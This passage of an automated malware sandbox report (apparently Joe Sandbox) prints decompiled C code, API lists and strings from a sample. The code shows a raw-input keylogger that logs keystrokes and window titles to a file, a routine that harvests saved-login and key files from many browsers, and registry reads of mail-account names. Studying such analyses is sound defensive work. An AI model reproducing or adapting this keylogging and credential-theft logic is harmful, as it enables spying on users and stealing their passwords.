                                                                      • Part of subcall function 02D18E66: GetWindowTextW.USER32 ref: 02D18EA2
                                                                      • Part of subcall function 02D18E66: lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 02D18F0B
                                                                      • Part of subcall function 02D18E66: CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000,?,?), ref: 02D18F79
                                                                      • Part of subcall function 02D18E66: lstrlenW.KERNEL32(02D24AD0,00000008,00000000,?,?), ref: 02D18FA2
                                                                      • Part of subcall function 02D18E66: WriteFile.KERNEL32(?,02D24AD0,00000000,?,?), ref: 02D18FAE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileWindowlstrlen$AsyncCallCreateForegroundHookNextStateTextWrite
                                                                    • String ID: [ALT]$[BKSP]$[CAPS]$[CTRL]$[DEL]$[ENTER]$[ESC]$[INSERT]$[TAB]
                                                                    • API String ID: 2452648998-4143582258
                                                                    • Opcode ID: 31ed34bdb0f454a13f8c8e3eb9cc1091eee06edbb065cea15b4a93608686c7e4
                                                                    • Instruction ID: 756c431b447089d5f47eba41a5039d9bfc50b9477e43a158fae2a1225123c5c0
                                                                    • Opcode Fuzzy Hash: 31ed34bdb0f454a13f8c8e3eb9cc1091eee06edbb065cea15b4a93608686c7e4
                                                                    • Instruction Fuzzy Hash: 8691F935F06270FBF928C599B2583766212EBA0209F524916DD87F7F90D7128D4CFAD2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1902E Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 277registrystringwindowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 85%
                                                                    			E02D1902E(void* __ecx, void* __eflags, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				char _v524;
				short _v564;
				intOrPtr _v568;
				short _v570;
				short _v572;
				long _v596;
				char _v600;
				int _v604;
				char _v612;
				intOrPtr _v616;
				struct _OVERLAPPED* _v620;
				char _v624;
				char _v628;
				void* _v632;
				char _v636;
				intOrPtr _v640;
				struct _OVERLAPPED* _v644;
				char _v648;
				void* _t76;
				short _t77;
				void* _t82;
				char* _t84;
				struct _OVERLAPPED** _t86;
				long _t88;
				intOrPtr _t93;
				intOrPtr* _t96;
				long _t100;
				intOrPtr _t101;
				WCHAR* _t102;
				intOrPtr _t104;
				void* _t105;
				long _t109;
				void* _t110;
				intOrPtr _t111;
				intOrPtr _t113;
				long _t116;
				intOrPtr _t117;
				intOrPtr _t119;
				long _t121;
				intOrPtr _t122;
				intOrPtr _t124;
				void* _t126;
				intOrPtr _t128;
				intOrPtr _t130;
				long _t132;
				intOrPtr _t133;
				intOrPtr _t135;
				DWORD* _t136;
				long _t137;
				intOrPtr _t138;
				long _t142;
				void* _t152;
				long _t164;
				intOrPtr _t178;
				intOrPtr _t189;
				void* _t195;
				struct _OVERLAPPED* _t198;
				struct _OVERLAPPED* _t201;
				void* _t204;
				void* _t206;
				void* _t208;
				signed int _t209;
				void* _t212;
				void* _t213;

				_t198 = 0;
				_v600 = 0;
				E02D11052( &_v524, 0, 0x208);
				_t212 = (_t209 & 0xfffffff8) - 0x25c + 0xc;
				_t201 = 0;
				_v604 = 0;
				_t76 = _a8 - 1;
				if(_t76 == 0) {
					_t77 = 6;
					_v570 = _t77;
					__eflags = 1;
					_v564 = _a4;
					_v568 = 0x130;
					_v572 = 1;
					__imp__RegisterRawInputDevices( &_v572, 1, 0xc);
				} else {
					_t82 = _t76 - 0xf;
					if(_t82 == 0) {
						PostQuitMessage(0);
					} else {
						if(_t82 == 0xef) {
							_t84 =  &_v600;
							__imp__GetRawInputData(_a16, 0x10000003, 0, _t84, 0x10);
							__eflags = _t84 - 0xffffffff;
							if(_t84 != 0xffffffff) {
								_t164 = E02D15F53(_v620);
								_v596 = _t164;
								__eflags = _t164;
								if(_t164 != 0) {
									_t86 =  &_v620;
									__imp__GetRawInputData(_a16, 0x10000003, _t164, _t86, 0x10);
									__eflags = _t86 - _v640;
									if(_t86 == _v640) {
										__eflags =  *((intOrPtr*)(_t164 + 0x18)) - 0x100;
										if( *((intOrPtr*)(_t164 + 0x18)) == 0x100) {
											_t88 = GetWindowTextW(GetForegroundWindow(),  &_v564, 0x104);
											__eflags = _t88;
											if(_t88 <= 0) {
												E02D132FF( &_v644, _t195, L"Unknow");
											} else {
												E02D13437( &_v648, E02D135E5( &_v636,  &_v564));
												E02D15EA5(_v644);
											}
											E02D194AE( &_v632,  *((intOrPtr*)(_t164 + 0x16)));
											E02D13437( &_v632,  &_v644);
											_t93 =  *0x2d296a0; // 0x0
											E02D1346A( &_v624,  *((intOrPtr*)(_t164 + 0x16)), __eflags, _t93 + 0x10);
											_t96 =  *0x2d296a0; // 0x0
											__eflags =  *_t96 - _t198;
											if( *_t96 != _t198) {
												_t213 = _t212 - 0x10;
												__eflags = _t96 + 0xa18;
												E02D11361(_t213, _t96 + 0xa18, _t96 + 0xa18);
												_t208 = _t213 - 0x10;
												E02D1362D(_t208,  &_v636);
												 *((intOrPtr*)(_t208 + 4)) = _v636;
												 *((short*)(_t208 + 8)) = _v632;
												E02D1362D(_t208 + 0xc,  &_v628);
												_t152 = E02D149AB( &_v612, __eflags);
												_t189 =  *0x2d296a0; // 0x0
												E02D14F2B( *((intOrPtr*)(_t189 + 0xa50)), _t152);
												E02D14981( &_v648);
												_t96 =  *0x2d296a0; // 0x0
											}
											__eflags =  *((intOrPtr*)(_t96 + 0xa14)) - _t198;
											if( *((intOrPtr*)(_t96 + 0xa14)) != _t198) {
												_t100 = lstrlenW(_t96 + 0x210);
												__eflags = _t100;
												_t101 =  *0x2d296a0; // 0x0
												if(_t100 == 0) {
													L17:
													_t102 = _t101 + 0x210;
													__eflags = _t102;
													lstrcpyW(_t102, _v632);
													_t104 =  *0x2d296a0; // 0x0
													 *(_t104 + 0xa10) = _t198;
												} else {
													_t142 = E02D13248( &_v648, E02D135E5( &_v636, _t101 + 0x210));
													E02D15EA5(_v644);
													_t101 =  *0x2d296a0; // 0x0
													_v644 = _t198;
													__eflags = _t142;
													if(_t142 == 0) {
														goto L17;
													} else {
														 *((intOrPtr*)(_t101 + 0xa10)) = 1;
													}
												}
												_t105 = CreateFileW( *(_t104 + 0xc), 4, 1, _t198, 4, 0x80, _t198);
												_t178 =  *0x2d296a0; // 0x0
												 *(_t178 + 4) = _t105;
												__eflags =  *((intOrPtr*)(_t178 + 0xa10)) - _t198;
												if(__eflags == 0) {
													_t49 = _t178 + 8; // 0x8
													_t204 = L"\r\n";
													_t116 = lstrlenW(_t204);
													_t117 =  *0x2d296a0; // 0x0
													WriteFile( *(_t117 + 4), _t204, _t116, _t49, _t198);
													_t119 =  *0x2d296a0; // 0x0
													_t121 = lstrlenW(_t204);
													_t122 =  *0x2d296a0; // 0x0
													WriteFile( *(_t122 + 4), _t204, _t121, _t119 + 8, _t198);
													_t124 =  *0x2d296a0; // 0x0
													_t126 = E02D13261( &_v632);
													_t128 =  *0x2d296a0; // 0x0
													WriteFile( *(_t128 + 4), _v632, _t126 + _t126, _t124 + 8, _t198);
													_t130 =  *0x2d296a0; // 0x0
													_t206 = L"\r\n";
													_t132 = lstrlenW(_t206);
													_t133 =  *0x2d296a0; // 0x0
													WriteFile( *(_t133 + 4), _t206, _t132, _t130 + 8, _t198);
													_t135 =  *0x2d296a0; // 0x0
													_t136 = _t135 + 8;
													__eflags = _t136;
													_t137 = lstrlenW(_t206);
													_t138 =  *0x2d296a0; // 0x0
													WriteFile( *(_t138 + 4), _t206, _t137, _t136, _t198);
													_t178 =  *0x2d296a0; // 0x0
												}
												_t58 = _t178 + 8; // 0x8
												_t109 = lstrlenW(E02D193C8( *((intOrPtr*)(_v616 + 0x16)), __eflags)) + _t108;
												__eflags = _t109;
												_t110 = E02D193C8( *((intOrPtr*)(_v616 + 0x16)), _t109);
												_t111 =  *0x2d296a0; // 0x0
												WriteFile( *(_t111 + 4), _t110, _t109, _t58, _t198);
												_t113 =  *0x2d296a0; // 0x0
												CloseHandle( *(_t113 + 4));
											}
											E02D15EA5(_v620);
											_v620 = _t198;
											E02D15EA5(_v632);
											_t201 = _v644;
										}
									}
								}
							}
						} else {
							_t198 = DefWindowProcA(_a4, _a8, _a12, _a16);
						}
					}
				}
				E02D15EA5(_t201);
				return _t198;
			}



































































                                                                    0x02d1903d
                                                                    0x02d1904a
                                                                    0x02d1904e
                                                                    0x02d19056
                                                                    0x02d19059
                                                                    0x02d1905b
                                                                    0x02d1905f
                                                                    0x02d19062
                                                                    0x02d1938b
                                                                    0x02d1938e
                                                                    0x02d19396
                                                                    0x02d19399
                                                                    0x02d193a3
                                                                    0x02d193ab
                                                                    0x02d193b0
                                                                    0x02d19068
                                                                    0x02d19068
                                                                    0x02d1906b
                                                                    0x02d19381
                                                                    0x02d19071
                                                                    0x02d19076
                                                                    0x02d19093
                                                                    0x02d190a1
                                                                    0x02d190a7
                                                                    0x02d190aa
                                                                    0x02d190b9
                                                                    0x02d190bb
                                                                    0x02d190bf
                                                                    0x02d190c1
                                                                    0x02d190c9
                                                                    0x02d190d7
                                                                    0x02d190dd
                                                                    0x02d190e1
                                                                    0x02d190e7
                                                                    0x02d190ee
                                                                    0x02d19105
                                                                    0x02d1910b
                                                                    0x02d1910d
                                                                    0x02d1913b
                                                                    0x02d1910f
                                                                    0x02d19122
                                                                    0x02d1912b
                                                                    0x02d1912b
                                                                    0x02d19147
                                                                    0x02d19155
                                                                    0x02d1915a
                                                                    0x02d19167
                                                                    0x02d1916c
                                                                    0x02d19171
                                                                    0x02d19173
                                                                    0x02d19175
                                                                    0x02d19178
                                                                    0x02d19180
                                                                    0x02d1918c
                                                                    0x02d19191
                                                                    0x02d1919d
                                                                    0x02d191a5
                                                                    0x02d191ae
                                                                    0x02d191b7
                                                                    0x02d191bc
                                                                    0x02d191c9
                                                                    0x02d191d2
                                                                    0x02d191d7
                                                                    0x02d191d7
                                                                    0x02d191dc
                                                                    0x02d191e2
                                                                    0x02d191ee
                                                                    0x02d191f7
                                                                    0x02d191f9
                                                                    0x02d191fe
                                                                    0x02d19239
                                                                    0x02d1923d
                                                                    0x02d1923d
                                                                    0x02d19243
                                                                    0x02d19249
                                                                    0x02d1924e
                                                                    0x02d19200
                                                                    0x02d19214
                                                                    0x02d1921f
                                                                    0x02d19224
                                                                    0x02d19229
                                                                    0x02d1922d
                                                                    0x02d1922f
                                                                    0x00000000
                                                                    0x02d19231
                                                                    0x02d19231
                                                                    0x02d19231
                                                                    0x02d1922f
                                                                    0x02d19263
                                                                    0x02d19269
                                                                    0x02d19275
                                                                    0x02d19278
                                                                    0x02d1927e
                                                                    0x02d19285
                                                                    0x02d19288
                                                                    0x02d1928f
                                                                    0x02d19296
                                                                    0x02d1929f
                                                                    0x02d192a1
                                                                    0x02d192ac
                                                                    0x02d192b3
                                                                    0x02d192bc
                                                                    0x02d192be
                                                                    0x02d192d0
                                                                    0x02d192d8
                                                                    0x02d192e1
                                                                    0x02d192e3
                                                                    0x02d192e8
                                                                    0x02d192f3
                                                                    0x02d192fa
                                                                    0x02d19303
                                                                    0x02d19305
                                                                    0x02d1930b
                                                                    0x02d1930b
                                                                    0x02d19310
                                                                    0x02d19317
                                                                    0x02d19320
                                                                    0x02d19322
                                                                    0x02d19322
                                                                    0x02d1932c
                                                                    0x02d19343
                                                                    0x02d19343
                                                                    0x02d19346
                                                                    0x02d1934c
                                                                    0x02d19354
                                                                    0x02d19356
                                                                    0x02d1935e
                                                                    0x02d1935e
                                                                    0x02d19368
                                                                    0x02d19371
                                                                    0x02d19375
                                                                    0x02d1937a
                                                                    0x02d1937a
                                                                    0x02d190ee
                                                                    0x02d190e1
                                                                    0x02d190c1
                                                                    0x02d19078
                                                                    0x02d1908a
                                                                    0x02d1908a
                                                                    0x02d19076
                                                                    0x02d1906b
                                                                    0x02d193b8
                                                                    0x02d193c5

                                                                    APIs
                                                                    • DefWindowProcA.USER32(?,?,?,?), ref: 02D19084
                                                                    • GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 02D190A1
                                                                    • GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 02D190D7
                                                                    • GetForegroundWindow.USER32 ref: 02D190F4
                                                                    • GetWindowTextW.USER32 ref: 02D19105
                                                                    • lstrlenW.KERNEL32(-00000210,-00000010,?,Unknow), ref: 02D191EE
                                                                    • PostQuitMessage.USER32(00000000), ref: 02D19381
                                                                    • RegisterRawInputDevices.USER32 ref: 02D193B0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InputWindow$Data$DevicesForegroundMessagePostProcQuitRegisterTextlstrlen
                                                                    • String ID: Unknow
                                                                    • API String ID: 3853268301-1240069140
                                                                    • Opcode ID: a6680180a979e3d5491c4efb273093091dea20fedce9104075e334963d921106
                                                                    • Instruction ID: 08ebe8da86ecd784272b7686c8544d347d6a57fa0896f71096a18ae4d9ceb1a0
                                                                    • Opcode Fuzzy Hash: a6680180a979e3d5491c4efb273093091dea20fedce9104075e334963d921106
                                                                    • Instruction Fuzzy Hash: 58A1CC71904240AFC720EF64ECA8EAA7BE9FFA9305F414858F88583390CB31DD18CB61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1C1B2 Relevance: 35.2, Strings: 28, Instructions: 218COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 98%
                                                                    			E02D1C1B2(void* __edx, intOrPtr _a4) {
				char _v48;
				char _v56;
				char _v60;
				char _v324;
				intOrPtr _v328;
				char _v332;
				char _v336;
				char _v340;
				char _v344;
				intOrPtr _v352;
				void* _t31;
				intOrPtr* _t59;
				intOrPtr* _t66;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t84;
				intOrPtr* _t86;
				intOrPtr* _t88;
				intOrPtr* _t90;
				intOrPtr* _t92;
				intOrPtr* _t94;
				intOrPtr* _t96;
				intOrPtr* _t98;
				intOrPtr* _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
				intOrPtr* _t108;
				intOrPtr* _t110;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t117;
				intOrPtr* _t120;
				intOrPtr _t126;
				void* _t134;
				void* _t135;
				intOrPtr _t139;
				signed int _t140;
				void* _t142;

				_t133 = __edx;
				_t142 = (_t140 & 0xfffffff8) - 0x34;
				_t72 = _a4;
				 *0x2d296a4 = _t72;
				_t73 =  *((intOrPtr*)(_t72 + 4));
				E02D237A8(_t73, __edx,  &_v48,  *((intOrPtr*)(_t72 + 8)), 0);
				_t143 = _v56;
				if(_v56 != 0) {
					_push(_t73);
					E02D1304C(_t142,  &_v48);
					_t76 =  *0x2d296a4; // 0x0
					E02D19FB3( *_t76, _t133, _t73);
					_t78 =  *0x2d296a4; // 0x0
					_t31 = E02D19FDA( *_t78, _t143);
					_t144 = _t31;
					if(_t31 != 0) {
						_t134 = 0x1a;
						E02D1F76B( &_v56, _t134, _t144);
						_t135 = 0x1a;
						E02D1F76B( &_v60, _t135, _t144);
						_t84 =  *0x2d296a4; // 0x0
						E02D1C4A8( *_t84, _t144, L"\\Google\\Chrome\\User Data\\Default\\Login Data", L"\\Google\\Chrome\\User Data\\Local State", 0, 0, 1);
						_t86 =  *0x2d296a4; // 0x0
						E02D1C4A8( *_t86, _t144, L"\\Epic Privacy Browser\\User Data\\Default\\Login Data", L"\\Epic Privacy Browser\\User Data\\Local State", 0, 0, 6);
						_t88 =  *0x2d296a4; // 0x0
						E02D1C4A8( *_t88, _t144, L"\\Microsoft\\Edge\\User Data\\Default\\Login Data", L"\\Microsoft\\Edge\\User Data\\Local State", 0, 0, 7);
						_t90 =  *0x2d296a4; // 0x0
						E02D1C4A8( *_t90, _t144, L"\\UCBrowser\\User Data_i18n\\Default\\UC Login Data.17", L"\\UCBrowser\\User Data_i18n\\Local State", 0, 1, 8);
						_t92 =  *0x2d296a4; // 0x0
						E02D1C4A8( *_t92, _t144, L"\\Tencent\\QQBrowser\\User Data\\Default\\Login Data", L"\\Tencent\\QQBrowser\\User Data\\Local State", 0, 0, 9);
						_t94 =  *0x2d296a4; // 0x0
						E02D1C4A8( *_t94, _t144, L"\\Opera Software\\Opera Stable\\Login Data", L"\\Opera Software\\Opera Stable\\Local State", 1, 0, 0xa);
						_t96 =  *0x2d296a4; // 0x0
						E02D1C4A8( *_t96, _t144, L"\\Blisk\\User Data\\Default\\Login Data", L"\\Blisk\\User Data\\Local State", 0, 0, 0xb);
						_t98 =  *0x2d296a4; // 0x0
						E02D1C4A8( *_t98, _t144, L"\\Chromium\\User Data\\Default\\Login Data", L"\\Chromium\\User Data\\Local State", 0, 0, 0xc);
						_t100 =  *0x2d296a4; // 0x0
						E02D1C4A8( *_t100, _t144, L"\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Login Data", L"\\BraveSoftware\\Brave-Browser\\User Data\\Local State", 0, 0, 0xd);
						_t102 =  *0x2d296a4; // 0x0
						E02D1C4A8( *_t102, _t144, L"\\Vivaldi\\User Data\\Default\\Login Data", L"\\Vivaldi\\User Data\\Local State", 0, 0, 0xe);
						_t104 =  *0x2d296a4; // 0x0
						E02D1C4A8( *_t104, _t144, L"\\Comodo\\Dragon\\User Data\\Default\\Login Data", L"\\Comodo\\Dragon\\User Data\\Local State", 0, 0, 0xf);
						_t106 =  *0x2d296a4; // 0x0
						E02D1C4A8( *_t106, _t144, L"\\Torch\\User Data\\Default\\Login Data", L"\\Torch\\User Data\\Local State", 0, 0, 0x10);
						_t108 =  *0x2d296a4; // 0x0
						E02D1C4A8( *_t108, _t144, L"\\Slimjet\\User Data\\Default\\Login Data", L"\\Slimjet\\User Data\\Local State", 0, 0, 0x11);
						_t110 =  *0x2d296a4; // 0x0
						E02D1C4A8( *_t110, _t144, L"\\CentBrowser\\User Data\\Default\\Login Data", L"\\CentBrowser\\User Data\\Local State", 0, 0, 0x12);
						_t112 =  *0x2d296a4; // 0x0
						E02D1B203( *_t112, _t135, _t144);
						_t114 =  *0x2d296a4; // 0x0
						E02D1A0D8( *_t114, _t135, _t144);
						E02D1362D(_t142,  &_v340);
						_t117 =  *0x2d296a4; // 0x0
						E02D1A6C8( *_t117, _t144,  *_t114);
						E02D1362D(_t142,  &_v344);
						_t120 =  *0x2d296a4; // 0x0
						E02D1AC0A( *_t120, _t144,  *_t117);
						E02D19F71(_t144);
						_t59 =  *0x2d296a4; // 0x0
						E02D12093( &_v340, _t144,  *_t59);
						_v328 = 0x2d274a4;
						E02D12093( &_v324, _t144,  &_v344);
						_t126 =  *0x2d296a4; // 0x0
						E02D14F2B( *((intOrPtr*)(_t126 + 8)),  &_v332);
						E02D23416( &_v336);
						_t129 = _v352;
						if(_v352 != 0) {
							E02D11A7E(_t129, _t129);
						}
						_t66 =  *0x2d296a4; // 0x0
						_t67 =  *_t66;
						_t130 =  *((intOrPtr*)(_t67 + 0x10));
						if( *((intOrPtr*)(_t67 + 0x10)) != 0) {
							E02D15EA5(_t130);
						}
						E02D15EA5(_v60);
						E02D15EA5(_v56);
					}
					_t80 =  *0x2d296a4; // 0x0
					_t139 =  *_t80;
					E02D15EEE(_t80);
					_t22 = _t139 + 0x24; // 0x24
					E02D11F76(_t22);
				}
				E02D13036( &_v48);
				return 0;
			}














































                                                                    0x02d1c1b2
                                                                    0x02d1c1b8
                                                                    0x02d1c1bb
                                                                    0x02d1c1c5
                                                                    0x02d1c1cf
                                                                    0x02d1c1d3
                                                                    0x02d1c1d8
                                                                    0x02d1c1dc
                                                                    0x02d1c1e2
                                                                    0x02d1c1eb
                                                                    0x02d1c1f0
                                                                    0x02d1c1f8
                                                                    0x02d1c1fd
                                                                    0x02d1c205
                                                                    0x02d1c20a
                                                                    0x02d1c20c
                                                                    0x02d1c214
                                                                    0x02d1c219
                                                                    0x02d1c220
                                                                    0x02d1c225
                                                                    0x02d1c22a
                                                                    0x02d1c240
                                                                    0x02d1c245
                                                                    0x02d1c25b
                                                                    0x02d1c260
                                                                    0x02d1c276
                                                                    0x02d1c27b
                                                                    0x02d1c292
                                                                    0x02d1c297
                                                                    0x02d1c2ad
                                                                    0x02d1c2b2
                                                                    0x02d1c2c9
                                                                    0x02d1c2ce
                                                                    0x02d1c2e4
                                                                    0x02d1c2e9
                                                                    0x02d1c2ff
                                                                    0x02d1c304
                                                                    0x02d1c31a
                                                                    0x02d1c321
                                                                    0x02d1c335
                                                                    0x02d1c33a
                                                                    0x02d1c350
                                                                    0x02d1c355
                                                                    0x02d1c36b
                                                                    0x02d1c370
                                                                    0x02d1c386
                                                                    0x02d1c38b
                                                                    0x02d1c3a1
                                                                    0x02d1c3a6
                                                                    0x02d1c3ae
                                                                    0x02d1c3b3
                                                                    0x02d1c3bb
                                                                    0x02d1c3c8
                                                                    0x02d1c3cd
                                                                    0x02d1c3d5
                                                                    0x02d1c3e2
                                                                    0x02d1c3e7
                                                                    0x02d1c3ef
                                                                    0x02d1c3fc
                                                                    0x02d1c401
                                                                    0x02d1c40c
                                                                    0x02d1c415
                                                                    0x02d1c422
                                                                    0x02d1c427
                                                                    0x02d1c435
                                                                    0x02d1c43e
                                                                    0x02d1c443
                                                                    0x02d1c449
                                                                    0x02d1c44c
                                                                    0x02d1c44c
                                                                    0x02d1c451
                                                                    0x02d1c456
                                                                    0x02d1c458
                                                                    0x02d1c45d
                                                                    0x02d1c45f
                                                                    0x02d1c45f
                                                                    0x02d1c468
                                                                    0x02d1c471
                                                                    0x02d1c471
                                                                    0x02d1c476
                                                                    0x02d1c47c
                                                                    0x02d1c47e
                                                                    0x02d1c483
                                                                    0x02d1c486
                                                                    0x02d1c486
                                                                    0x02d1c48f
                                                                    0x02d1c49a

                                                                    Strings
                                                                    • \Epic Privacy Browser\User Data\Default\Login Data, xrefs: 02D1C256
                                                                    • \Tencent\QQBrowser\User Data\Default\Login Data, xrefs: 02D1C2A8
                                                                    • \Vivaldi\User Data\Default\Login Data, xrefs: 02D1C330
                                                                    • \Slimjet\User Data\Local State, xrefs: 02D1C37C
                                                                    • \UCBrowser\User Data_i18n\Local State, xrefs: 02D1C288
                                                                    • \Comodo\Dragon\User Data\Local State, xrefs: 02D1C346
                                                                    • \Google\Chrome\User Data\Default\Login Data, xrefs: 02D1C23B
                                                                    • \Blisk\User Data\Local State, xrefs: 02D1C2DA
                                                                    • \CentBrowser\User Data\Local State, xrefs: 02D1C397
                                                                    • \Opera Software\Opera Stable\Login Data, xrefs: 02D1C2C4
                                                                    • \Microsoft\Edge\User Data\Local State, xrefs: 02D1C26C
                                                                    • \CentBrowser\User Data\Default\Login Data, xrefs: 02D1C39C
                                                                    • \UCBrowser\User Data_i18n\Default\UC Login Data.17, xrefs: 02D1C28D
                                                                    • \Blisk\User Data\Default\Login Data, xrefs: 02D1C2DF
                                                                    • \Torch\User Data\Default\Login Data, xrefs: 02D1C366
                                                                    • \Google\Chrome\User Data\Local State, xrefs: 02D1C236
                                                                    • \Chromium\User Data\Default\Login Data, xrefs: 02D1C2FA
                                                                    • \Vivaldi\User Data\Local State, xrefs: 02D1C329
                                                                    • \BraveSoftware\Brave-Browser\User Data\Local State, xrefs: 02D1C310
                                                                    • \Torch\User Data\Local State, xrefs: 02D1C361
                                                                    • \Slimjet\User Data\Default\Login Data, xrefs: 02D1C381
                                                                    • \Microsoft\Edge\User Data\Default\Login Data, xrefs: 02D1C271
                                                                    • \Epic Privacy Browser\User Data\Local State, xrefs: 02D1C251
                                                                    • \Chromium\User Data\Local State, xrefs: 02D1C2F5
                                                                    • \Opera Software\Opera Stable\Local State, xrefs: 02D1C2BF
                                                                    • \BraveSoftware\Brave-Browser\User Data\Default\Login Data, xrefs: 02D1C315
                                                                    • \Tencent\QQBrowser\User Data\Local State, xrefs: 02D1C2A3
                                                                    • \Comodo\Dragon\User Data\Default\Login Data, xrefs: 02D1C34B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FilePath$lstrcatlstrcpy$BinaryCopyExistsOpenType$CloseCombineEnumFolderInfoPrivateProfileQuerySpecialString
                                                                    • String ID: \Blisk\User Data\Default\Login Data$\Blisk\User Data\Local State$\BraveSoftware\Brave-Browser\User Data\Default\Login Data$\BraveSoftware\Brave-Browser\User Data\Local State$\CentBrowser\User Data\Default\Login Data$\CentBrowser\User Data\Local State$\Chromium\User Data\Default\Login Data$\Chromium\User Data\Local State$\Comodo\Dragon\User Data\Default\Login Data$\Comodo\Dragon\User Data\Local State$\Epic Privacy Browser\User Data\Default\Login Data$\Epic Privacy Browser\User Data\Local State$\Google\Chrome\User Data\Default\Login Data$\Google\Chrome\User Data\Local State$\Microsoft\Edge\User Data\Default\Login Data$\Microsoft\Edge\User Data\Local State$\Opera Software\Opera Stable\Local State$\Opera Software\Opera Stable\Login Data$\Slimjet\User Data\Default\Login Data$\Slimjet\User Data\Local State$\Tencent\QQBrowser\User Data\Default\Login Data$\Tencent\QQBrowser\User Data\Local State$\Torch\User Data\Default\Login Data$\Torch\User Data\Local State$\UCBrowser\User Data_i18n\Default\UC Login Data.17$\UCBrowser\User Data_i18n\Local State$\Vivaldi\User Data\Default\Login Data$\Vivaldi\User Data\Local State
                                                                    • API String ID: 2377953819-4166025770
                                                                    • Opcode ID: 6fe197d108bea07319584c566a19f2216409f01466bf879a54fe723e4c390883
                                                                    • Instruction ID: 770c1f12de0bebebb8f7064fe6bb6f93f615040b61956686a2a2726175077b40
                                                                    • Opcode Fuzzy Hash: 6fe197d108bea07319584c566a19f2216409f01466bf879a54fe723e4c390883
                                                                    • Instruction Fuzzy Hash: 94719230794250BFE728EB60FD61EAA379AEFA6715F500459B4075BB90CA616C0CCF71
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1A29A Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 296registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 98%
                                                                    			E02D1A29A(void* __ecx, void* __edx, void* __eflags, void* _a4) {
				int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v292;
				char _v556;
				char _v820;
				char _v9012;
				char _v17204;
				long _t124;
				long _t130;
				long _t136;
				long _t142;
				void* _t180;
				void* _t181;
				void* _t199;
				void* _t207;
				void* _t208;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t216;
				void* _t217;

				_t199 = __edx;
				_t181 = __ecx;
				E02D11190(0x4334, __ecx);
				_v8 = 0x1000;
				_v24 = 0;
				_v20 = 0;
				_t180 = _t181;
				_v16 = 0;
				E02D11052( &_v292, 0, 0x104);
				E02D11052( &_v556, 0, 0x104);
				E02D11052( &_v820, 0, 0x104);
				E02D11052( &_v9012, 0, _v8);
				_t207 = _a4;
				_t209 = _t208 + 0x30;
				if(RegQueryValueExW(_t207, L"Account Name", 0, 0,  &_v9012,  &_v8) == 0) {
					E02D132FF( &_v20, _t199,  &_v9012);
				}
				_v8 = 0x1000;
				E02D11052( &_v9012, 0, 0x1000);
				_t210 = _t209 + 0xc;
